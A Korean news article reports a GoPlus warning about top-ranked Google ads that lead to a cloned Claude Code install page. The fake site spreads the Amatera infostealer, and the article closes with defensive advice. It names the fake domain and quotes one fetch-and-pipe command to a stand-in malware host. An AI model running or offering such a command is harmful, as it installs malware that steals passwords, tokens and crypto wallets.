고플러스, "구글 검색 'Claude Code' 최상단 광고, 악성코드 주의보"

공식 사이트 완벽 복제한 피싱…비밀번호·암호화폐 지갑 탈취 'Amatera' 인포스틸러 유포

블록체인 보안업체 고플러스(GoPlus)가 구글 검색에서 'Claude Code' 설치 페이지를 검색할 경우 최상단에 노출되는 광고가 악성 프로그램이라며 주의를 당부했다.

고플러스는 11일 보안 경보를 통해 "공격자들이 구글 광고를 통해 Claude Code 공식 설치 페이지를 픽셀 단위로 완벽하게 복제한 가짜 사이트를 유포하고 있다"며 "이 악성 소프트웨어는 사용자의 비밀번호, 쿠키, 세션 토큰, 암호화폐 지갑, 인증 정보, 시스템 정보를 탈취한다"고 밝혔다.

Windows·Mac 모두 표적…'Amatera' 인포스틸러 배포

보안업체 멀웨어바이츠(Malwarebytes)에 따르면, 현재 진행 중인 Claude Code 피싱 캠페인은 윈도우(Windows)와 맥(Mac) 사용자 모두를 표적으로 하며, 'Amatera'라는 인포스틸러(정보 탈취 악성코드)를 배포한다.

Amatera는 비교적 최근에 등장한 인포스틸러로, 브라우저에 저장된 비밀번호, 쿠키, 세션 토큰, 암호화폐 지갑 자격 증명 등 민감한 데이터를 탈취하는 데 특화되어 있다.

공격자들은 'claude.update-version.com'과 같은 공식적으로 보이는 가짜 도메인을 사용하며, 구글 광고가 실제 검색 결과보다 상단에 노출되기 때문에 진짜 URL을 모르는 사용자들은 쉽게 속을 수 있다.

보안업체 SC월드(SC World)는 지난 9일 "이번 공격은 'InstallFix'라는 새로운 공격 기법을 사용한다"며 "최신 설치 가이드들이 사용자에게 터미널에 명령어를 복사해 실행하도록 안내하는 방식을 악용한 것"이라고 설명했다.

사용자가 가짜 사이트에서 제공하는 curl https://malware-site bash와 같은 명령어를 실행하면 악성코드가 자동으로 다운로드되고 설치된다.

"광고 식별·URL 검증·다중 채널 확인 필수"

고플러스는 사용자들에게 다음과 같은 보안 수칙을 권장했다.

먼저 검색 결과에서 광고 표시를 확인하고, URL과 공식 웹사이트의 미세한 차이를 주의 깊게 검토해야 한다. 또한 공식 문서, 소셜 미디어, 깃허브(GitHub) 저장소 등 여러 채널을 통해 설치 방법을 확인하고, 익숙하지 않은 명령어는 실행 전 동작을 분석해야 한다.

아울러 피싱 링크, 위험한 서명, 권한 부여 및 거래를 실시간으로 차단하는 보안 플러그인 설치도 권장했다.

레딧(Reddit)의 ClaudeCode 커뮤니티에서도 "지금 구글에서 'install Claude Code'를 검색하면 첫 번째 결과가 유료 광고이며, claude.update-version.com이라는 가짜 도메인으로 연결된다"는 경고가 공유됐다.

보안 전문가들은 "구글 광고의 추적 기능을 악용한 악성코드 유포 사례는 과거에도 발견된 바 있다"며 "공식 소스를 통한 소프트웨어 다운로드와 URL 검증이 무엇보다 중요하다"고 강조했다.

최주훈 joohoon@blockstreet.co.kr